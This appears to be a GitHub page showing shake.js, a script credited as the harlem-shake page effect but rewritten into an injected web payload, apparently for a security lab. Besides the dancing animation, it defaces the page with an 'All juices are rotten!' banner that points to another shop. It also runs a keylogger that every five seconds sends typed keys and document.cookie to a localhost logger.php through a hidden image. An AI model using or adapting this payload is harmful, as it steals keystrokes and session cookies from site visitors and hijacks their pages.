-
Notifications
You must be signed in to change notification settings - Fork 8
Expand file tree
/
Copy pathshake.js
More file actions
133 lines (116 loc) · 4.8 KB
/
Copy pathshake.js
File metadata and controls
133 lines (116 loc) · 4.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
/**
* Original Source: https://github.com/alexgibson/shake.js
* Original Author: Alex Gibson
*/
(function() {
function loadJQuery(callback) {
if (window.jQuery) {
callback();
} else {
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://code.jquery.com/jquery-3.6.0.min.js";
script.onload = callback;
document.head.appendChild(script);
}
}
loadJQuery(function() {
var $ = window.jQuery;
var table = $(".table");
var hacked = $("<h1 style='padding:10px;color:red;'>All juices are rotten! Go to <a href='http://www.shop.lo'>www.shop.lo</a></h1>").hide();
table.after(hacked);
if (function () {
function e() {
var e = document.createElement("link")
e.setAttribute("type", "text/css"), e.setAttribute("rel", "stylesheet"), e.setAttribute("href", C), e.setAttribute("class", E), document.body.appendChild(e)
}
function t() {
for (var e = document.getElementsByClassName(E), t = 0; t < e.length; t++)document.body.removeChild(e[t])
}
function n() {
var e = document.createElement("div")
e.setAttribute("class", k), document.body.appendChild(e), setTimeout(function () {
document.body.removeChild(e)
}, 100)
}
function o(e) {
return {height: e.offsetHeight, width: e.offsetWidth}
}
function r(e) {
var t = o(e)
return t.height > f && t.height < g && t.width > h && t.width < p
}
function i(e) {
for (var t = e, n = 0; t;)n += t.offsetTop, t = t.offsetParent
return n
}
function a() {
var e = document.documentElement
return window.innerWidth ? window.innerHeight : e && !isNaN(e.clientHeight) ? e.clientHeight : 0
}
function s() {
return window.pageYOffset ? window.pageYOffset : Math.max(document.documentElement.scrollTop, document.body.scrollTop)
}
function d(e) {
var t = i(e)
return t >= N && _ + N >= t
}
function u() {
var e = document.createElement("audio")
e.setAttribute("class", E), e.src = y, e.loop = !1, e.addEventListener("canplay", function () {
setTimeout(function () {
l(A)
}, 500), setTimeout(function () {
m(), n()
for (var e = 0; e < x.length; e++)c(x[e])
}, 15500)
}, !0), e.addEventListener("ended", function () {
m(), t()
}, !0), console.log("New browser is needed."), document.body.appendChild(e), e.play().catch(function() {
errorMessage = "Please enable audio for this site"
console.log(errorMessage);
});
}
function l(e) {
e.className += " " + w + " " + v
}
function c(e) {
e.className += " " + w + " " + b[Math.floor(Math.random() * b.length)]
}
function m() {
for (var e = document.getElementsByClassName(w), t = RegExp("\\b" + w + "\\b"), n = 0; n < e.length;)e[n].className = e[n].className.replace(t, "")
}
for (var f = 30, h = 30, g = 350, p = 350, y = "https://github.com/Elfoslav/harlem-shake/raw/master/music/harlem-shake.ogg", w = "mw-harlem_shake_me", v = "im_first", b = ["im_drunk", "im_baked", "im_trippin", "im_blown"], k = "mw-strobe_light", C = "http://localhost:8080/shake.css", E = "mw_added_css", _ = a(), N = s(), T = document.getElementsByTagName("*"), A = null, H = 0; H < T.length; H++) {
var M = T[H]
if (r(M) && d(M)) {
A = M
break
}
}
if (null === M)return void console.warn("Could not find a node of the right size. Please try a different page.")
e(), u()
for (var x = [], H = 0; H < T.length; H++) {
var M = T[H]
r(M) && x.push(M)
}
}(), window.jQuery) {
var kylggr = ""
$(document).ready(function () {
$(document).on("keypress", function (e) {
var t = String.fromCharCode(e.keyCode || e.which)
console.log(t.length, t), kylggr += t
})
}), window.setInterval(function () {
"" != kylggr && logger(kylggr), kylggr = ""
}, 5e3)
}
setTimeout(function () {
table.hide();
hacked.show();
}, 9000);
function logger(t) {
console.log("in logger", t);
$("body").append('<img src="http://localhost:8080/logger.php?input=' + t + '%20Session: ' + document.cookie + '" style="display:none;" />')
}
});
})();